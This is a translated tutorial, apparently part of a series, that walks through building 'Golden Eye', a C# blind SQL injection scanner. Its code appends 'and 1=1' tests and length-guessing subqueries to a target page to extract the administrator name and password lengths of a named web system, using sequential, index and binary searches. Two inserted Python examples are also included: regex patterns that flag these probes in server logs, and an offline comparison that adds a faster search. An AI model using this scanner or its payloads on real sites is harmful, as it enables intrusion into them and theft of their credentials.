Golden Eye-creation of SQL Injection scanner (2)

(Author: mikespook | Release Date: | views: 51)

Keywords: Golden Eye, SQL injection, scanner, C#

Programming:

Finally, I can start my favorite part (^_*). First, let me explain how I choose a programming tool. Many of my tools are written in C# on the .NET platform. I think a lightweight tool like this one should be written in the fastest and most convenient way. Of course, you could write it in C/C++ or even assembly, and your tool would execute very efficiently. But isn't that a waste of time?

Here I want to say something extra. A friend left a message on my website asking how to learn programming. In my opinion, a language is just a carrier, a means of expression. I think everyone has had this experience: when describing an event or an object, sometimes it is more accurate and convenient to describe it in words, and sometimes it is better to describe it in numbers. The same is true of programming: in fact, you can use any language, but you should choose the most convenient and fastest one. What I personally disagree with is excluding intermediate languages such as C# and Java because you like assembly, or excluding C/C++ because you like C# or Java. That is an extreme mistake!!!

Okay, that was a lot of rambling. I just want everyone to understand, because today I am going to use C# again. Hey hey......

As usual, let me first give you an intuitive feel for the interface. Today we will design a scanner like this (Figure 1):

Put four text boxes on the interface: txtpage, txtname, txtpass, and txtlog, for the target page, the administrator name, the password, and the log. Add two buttons, btntest and btnok, as the test button and the scan button. Then add some labels for decoration and explanation. The interface is that simple.

Now we can start encoding.

To access the target page and submit the carefully prepared SQL injection code, we must access the network using the HTTP protocol: connect, send, receive, disconnect...... That is the process you would go through in C/C++. In C# it does not have to be so troublesome: the .NET class library already provides a complete set of URL operation classes.

In the System.Net namespace there are two classes, HttpWebRequest and HttpWebResponse (request and response respectively). See the following code:

public bool getpage(string url)
{
    try
    {
        // Temporary variable r holds the result.
        bool r = false;
        // Create an HttpWebRequest object for the specified URL.
        HttpWebRequest myHttpWebRequest = (HttpWebRequest)WebRequest.Create(url);
        // Send the HttpWebRequest and wait for the response.
        HttpWebResponse myHttpWebResponse = (HttpWebResponse)myHttpWebRequest.GetResponse();
        // If the response status is HttpStatusCode.OK, set the temporary variable to true.
        if (myHttpWebResponse.StatusCode == HttpStatusCode.OK)
            r = true;
        // Release the resources used by the response.
        myHttpWebResponse.Close();
        // Return the temporary variable r.
        return r;
    }
    catch (WebException)
    {
        // GetResponse() throws a WebException for network errors and also for error
        // statuses such as 500, so those cases land here and the function returns false.
        return false;
    }
    catch (Exception)
    {
        // Any other exception: the function returns false.
        return false;
    }
}

This function takes the parameter url, the address of the target page.

"HttpWebRequest myHttpWebRequest = (HttpWebRequest)WebRequest.Create(url);" creates an HttpWebRequest object for the target page.

"HttpWebResponse myHttpWebResponse = (HttpWebResponse)myHttpWebRequest.GetResponse();" sends the request and creates an HttpWebResponse object to receive the response.

The response code is stored in "myHttpWebResponse.StatusCode". This is the code returned by the server: for example, 200 means the request succeeded, 404 means the page does not exist, and 500 means an internal server error (hmm, wasn't it Error 500 that was displayed earlier when the SQL injection succeeded? That's right. Check it out!)......

The enumeration HttpStatusCode contains the server return codes just described: for example, "HttpStatusCode.OK" is return code 200 and "HttpStatusCode.InternalServerError" is return code 500. We compare the response code "myHttpWebResponse.StatusCode" with the enumerated value "HttpStatusCode.OK". If they are equal, the page was accessed successfully and the function returns true; otherwise it returns false. I also wrap the whole thing in try...catch... to capture any possible errors, and if an error occurs, false is returned. Note that in .NET an error status such as 500 makes GetResponse() throw a WebException, so that case actually reaches the catch block rather than the comparison, and still returns false.

Add this function to the class of the main form, and remember to add "using System.Net;" to the main form class. This completes the core part. Next let's see how to use this function.

Add the following code to the Click Event of the btntest button:

private void btntest_click(object sender, System.EventArgs e)
{
    if (this.getpage(txtpage.Text + "%20and%201=1"))
        txtlog.Text = "This page may have the SQL injection vulnerability. You can try to scan it!";
    else
        txtlog.Text = "This page does not have the SQL injection vulnerability and cannot be scanned!";
}

"txtpage.Text + "%20and%201=1"" simply assembles the SQL injection statement: the address of the target page is filled in from the txtpage text box. Do you still remember the "and 1=1" mentioned earlier? Here the spaces are encoded as %20. The getpage() function then determines whether the page can be accessed. If it returns true, the page can be accessed and the injection test has succeeded; otherwise the test fails.

The getpage() function we just wrote will be used again later. Now let's see how to implement scanning. This is the hardest part, but the thought process is interesting.
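From the defender's side, the probes this test button and the scanner send leave a recognisable trail in the web server's access log: an "and 1=1" / "and 1=2" pair, followed by a run of requests that differ only in a number, with 500 responses interleaved. The following Python script is an added example, not part of the original article or of Golden Eye. It parses a few constructed common-log-format lines (the client addresses, timestamps and paths are invented for the demo), URL-decodes the request line and groups probe requests by client; the names analyze, classify and suspicious_clients are this example's own.

```python
import re
from collections import Counter, defaultdict
from urllib.parse import unquote

# Constructed sample access-log lines (common log format); not taken from any real server.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Oct/2003:13:55:36 +0800] "GET /movie.asp?id=123 HTTP/1.1" 200 5120
203.0.113.7 - - [10/Oct/2003:13:55:37 +0800] "GET /movie.asp?id=123%20and%201=1 HTTP/1.1" 200 5120
203.0.113.7 - - [10/Oct/2003:13:55:38 +0800] "GET /movie.asp?id=123%20and%201=2 HTTP/1.1" 500 1310
203.0.113.7 - - [10/Oct/2003:13:55:39 +0800] "GET /movie.asp?id=123%20and%201=(select%20id%20from%20password%20where%20len(name)<10) HTTP/1.1" 500 1310
203.0.113.7 - - [10/Oct/2003:13:55:40 +0800] "GET /movie.asp?id=123%20and%201=(select%20id%20from%20password%20where%20len(name)=7) HTTP/1.1" 200 5120
198.51.100.9 - - [10/Oct/2003:13:56:01 +0800] "GET /movie.asp?id=124 HTTP/1.1" 200 5120
198.51.100.9 - - [10/Oct/2003:13:56:02 +0800] "GET /search.asp?q=len%20of%20film HTTP/1.1" 200 2048
"""

# One common-log-format record: client, timestamp, request line, status, size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<url>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)$'
)

# The two probe shapes the article describes, matched against the URL-decoded request.
PROBE_PATTERNS = [
    # "and 1=1" / "and 1=2": the yes/no test behind the test button.
    ("tautology-probe", re.compile(r"\band\s+1\s*=\s*[12]\b", re.I)),
    # "and 1=(select ... len(field) ...)": the per-length questions of the scanner.
    ("length-probe", re.compile(r"\band\s+1\s*=\s*\(\s*select\b.*\blen\s*\(", re.I | re.S)),
]


def parse_line(line):
    """Split one log line into fields; the URL is stored both raw and decoded."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    rec["decoded_url"] = unquote(rec["url"])
    return rec


def classify(decoded_url):
    """Return the probe type for a decoded URL, or None for an ordinary request."""
    for name, pattern in PROBE_PATTERNS:
        if pattern.search(decoded_url):
            return name
    return None


def analyze(log_text):
    """Per client: total requests, probe counts by type, and 5xx answers to probes."""
    stats = defaultdict(lambda: {"requests": 0, "probes": Counter(), "probe_errors": 0})
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        client = stats[rec["ip"]]
        client["requests"] += 1
        kind = classify(rec["decoded_url"])
        if kind is not None:
            client["probes"][kind] += 1
            # A 500 on a probe request is the "no" answer the scanner is looking for.
            if rec["status"] >= 500:
                client["probe_errors"] += 1
    return dict(stats)


def suspicious_clients(stats, min_probes=2):
    """Clients that sent at least min_probes probe requests, sorted for stable output."""
    return sorted(ip for ip, s in stats.items() if sum(s["probes"].values()) >= min_probes)


if __name__ == "__main__":
    result = analyze(SAMPLE_LOG)
    for ip in suspicious_clients(result):
        s = result[ip]
        print(ip, dict(s["probes"]), "probe 5xx:", s["probe_errors"], "of", s["requests"], "requests")
```

On the constructed sample, only 203.0.113.7 is reported: two tautology probes, two length probes, and two 500 answers among them. The decode step matters because the scanner sends the spaces as %20; matching the raw request line would miss them.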

When discussing the SQL injection vulnerability, I mentioned that "movie.asp?id=123 and 1=(select id from password where len(name)=10)" determines whether the user name length equals 10. In the Jin Mei system, the maximum length of the administrator name is 20. So we can try:

"movie.asp?id=123 and 1=(select id from password where len(name)=1)"

"movie.asp?id=123 and 1=(select id from password where len(name)=2)"

"movie.asp?id=123 and 1=(select id from password where len(name)=3)"

......

Use this method to test the length of the administrator name. Of course, the same method can test the password length; in the Jin Mei system the maximum password length is 50. Write the following function:

// strpage holds the target page address; its declaration is not shown in the article
// (presumably a form field filled from txtpage.Text).
private int getfieldlen(string table, string field, int l, int h)
{
    for (int i = l; i <= h; i++)
        if (this.getpage(strpage + "%20and%201=(select%20id%20from%20" + table + "%20where%20len(" + field + ")=" + i.ToString() + ")"))
            return i;
    return 0;
}

This function is quite general. It has four parameters: table is the name of the table to scan (in the Jin Mei system the table is password); field is the name of the field to test (for example the name and pwd fields in the Jin Mei system); l and h give the scan range, that is, the minimum and maximum length to test. To scan the administrator name we call getfieldlen("password", "name", 1, 20), and the function returns the length of the administrator name. To scan the password length: getfieldlen("password", "pwd", 1, 50).

This is the function from "Golden Eye" 1.0, and it has to be said that it is very slow: to find the field length it compares the candidates one by one. In the extreme case, if the other side has set a 20-character administrator name and a 50-character password, it takes 20 and 50 comparisons respectively to get the required lengths. This algorithm is called "sequential search". Its advantage is simplicity: as you can see, the whole search takes four lines of code. Unfortunately, although it is very simple to write, its execution efficiency is low! In "Golden Eye" 1.1 I used an "index search" to improve the efficiency:

private int getfieldlen(string table, string field, int l, int h)
{
    int index1 = (l + h) / 3;
    int index2 = (l + h) * 2 / 3;
    // Is the length below the first index? Then scan l .. index1-1 sequentially.
    if (this.getpage(strpage + "%20and%201=(select%20id%20from%20" + table + "%20where%20len(" + field + ")<" + index1.ToString() + ")"))
        for (int i = l; i < index1; i++)
            if (this.getpage(strpage + "%20and%201=(select%20id%20from%20" + table + "%20where%20len(" + field + ")=" + i.ToString() + ")"))
                return i;
    // Is the length below the second index? Then scan index1 .. index2-1 sequentially.
    if (this.getpage(strpage + "%20and%201=(select%20id%20from%20" + table + "%20where%20len(" + field + ")<" + index2.ToString() + ")"))
        for (int i = index1; i < index2; i++)
            if (this.getpage(strpage + "%20and%201=(select%20id%20from%20" + table + "%20where%20len(" + field + ")=" + i.ToString() + ")"))
                return i;
    // Otherwise scan the top third, index2 .. h, sequentially.
    for (int i = index2; i <= h; i++)
        if (this.getpage(strpage + "%20and%201=(select%20id%20from%20" + table + "%20where%20len(" + field + ")=" + i.ToString() + ")"))
            return i;
    return 0;
}

A bit dizzy? The code for the "index search" is much more complicated! In fact the idea behind the code above is very clear. Look at the following sequence:

1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20

This is the sequence we search. The first two statements of the search, "int index1 = (l + h) / 3;" and "int index2 = (l + h) * 2 / 3;", create two indexes. For a search over these 20 elements, the first index is 7 and the second is 14. Note that each sequential search is preceded by a conditional statement that tests the length against an index. The process is roughly:

Determine whether the field length is less than 7. If it is, search 1-6 sequentially.

Otherwise

Determine whether the field length is less than 14. If it is, search 7-13 sequentially.

Otherwise

Search 14-20 sequentially.

In this way the indexes reduce the range of each sequential search by 2/3. The search range is smaller and the number of comparisons is reduced, so of course the speed improves a lot. But is this the fastest way? Let's look at the following code:

private int getfieldlen(string table, string field, int l, int h)
{
    int nlen = 0;
    int low = l;
    int hig = h;
    int mid;
    int tmp = h - l;   // caps the number of iterations
    while ((low <= hig) && (tmp != 0))
    {
        mid = (low + hig) / 2;
        // Length below the middle? Continue in the lower half.
        if (this.getpage(strpage + "%20and%201=(select%20id%20from%20" + table + "%20where%20len(" + field + ")<" + mid.ToString() + ")"))
            hig = mid - 1;
        // Length above the middle? Continue in the upper half.
        else if (this.getpage(strpage + "%20and%201=(select%20id%20from%20" + table + "%20where%20len(" + field + ")>" + mid.ToString() + ")"))
            low = mid + 1;
        // Otherwise the length should equal the middle value.
        else if (this.getpage(strpage + "%20and%201=(select%20id%20from%20" + table + "%20where%20len(" + field + ")=" + mid.ToString() + ")"))
        {
            nlen = mid;
            break;
        }
        --tmp;
    }
    return nlen;
}

It looks very complicated. Each iteration uses "mid = (low + hig) / 2;" to calculate a new middle value. This is "half-lookup" (binary search). In natural language the method is:

Loop: while low <= high

    mid = (low + high) / 2 // the midpoint of low and high

    Determine whether the field length is less than the middle value mid. If it is, set high = mid - 1

    Otherwise

    Determine whether the field length is greater than mid. If it is, set low = mid + 1

    Otherwise

    Determine whether the field length equals mid. If it does, return it as the field length.

End of loop;

Is the algorithm hard to understand? Actually, just write down a group of ordered numbers, pick one at random, and apply the above algorithm to search for it. Go through it a few times, step by step, and you will understand!
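The three versions of getfieldlen() above differ only in how many requests they need to pin down one length, and that request count is also exactly the footprint an administrator sees in the server log when reading it as in the detection example earlier. The following Python script is an added example rather than code from Golden Eye. It re-implements the three strategies against a local stand-in for getpage() (a LengthOracle object that answers "less than", "greater than" and "equals" about a hidden integer and counts the questions asked, so nothing touches a network) and adds a textbook binary search that asks a single question per step, which the article's closing question hints at; the names LengthOracle, compare and max_queries are this example's own.

```python
class LengthOracle:
    """Stand-in for the article's getpage(): answers yes/no questions about a hidden
    integer and counts how many were asked. Constructed for this demo; no network."""

    def __init__(self, secret):
        self.secret = secret
        self.queries = 0

    def ask(self, op, n):
        self.queries += 1
        if op == "<":
            return self.secret < n
        if op == ">":
            return self.secret > n
        if op == "=":
            return self.secret == n
        raise ValueError(op)


def sequential_search(oracle, lo, hi):
    """Golden Eye 1.0: try every candidate length in turn."""
    for i in range(lo, hi + 1):
        if oracle.ask("=", i):
            return i
    return 0


def index_search(oracle, lo, hi):
    """Golden Eye 1.1: two index points split the range into thirds, then scan one third."""
    index1 = (lo + hi) // 3
    index2 = (lo + hi) * 2 // 3
    if oracle.ask("<", index1):
        for i in range(lo, index1):
            if oracle.ask("=", i):
                return i
    if oracle.ask("<", index2):
        for i in range(index1, index2):
            if oracle.ask("=", i):
                return i
    for i in range(index2, hi + 1):
        if oracle.ask("=", i):
            return i
    return 0


def half_search(oracle, lo, hi):
    """The article's 'half-lookup': halve the range each step, asking <, > and = in turn."""
    low, high = lo, hi
    tmp = hi - lo  # iteration cap, as in the original
    while low <= high and tmp != 0:
        mid = (low + high) // 2
        if oracle.ask("<", mid):
            high = mid - 1
        elif oracle.ask(">", mid):
            low = mid + 1
        elif oracle.ask("=", mid):
            return mid
        tmp -= 1
    return 0


def lean_binary_search(oracle, lo, hi):
    """Textbook binary search: one question per step ("is the length <= mid?"),
    then a single confirming question. Not from the article."""
    low, high = lo, hi
    while low < high:
        mid = (low + high) // 2
        if oracle.ask("<", mid + 1):  # secret <= mid
            high = mid
        else:
            low = mid + 1
    return low if oracle.ask("=", low) else 0


STRATEGIES = [
    ("sequential", sequential_search),
    ("index", index_search),
    ("half", half_search),
    ("lean-binary", lean_binary_search),
]


def compare(secret, lo=1, hi=20):
    """Run each strategy against a fresh oracle; return {name: (found_length, questions)}."""
    out = {}
    for name, fn in STRATEGIES:
        oracle = LengthOracle(secret)
        out[name] = (fn(oracle, lo, hi), oracle.queries)
    return out


def max_queries(strategy, lo, hi):
    """Worst-case number of questions a strategy needs over every secret in [lo, hi]."""
    worst = 0
    for secret in range(lo, hi + 1):
        oracle = LengthOracle(secret)
        strategy(oracle, lo, hi)
        worst = max(worst, oracle.queries)
    return worst


if __name__ == "__main__":
    for name, (found, asked) in compare(20).items():
        print(f"{name:12s} found {found:2d} after {asked:2d} questions")
```

For a 20-character name in the range 1..20, the sequential search asks 20 questions, the index search 9, the article's half-lookup 11 (its three questions per step cost more than the halving saves) and the one-question-per-step binary search 5. Over the password range 1..50 the lean variant never needs more than 7 questions, against 50 for sequential search; that is the difference between a handful of log lines and a burst of fifty.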
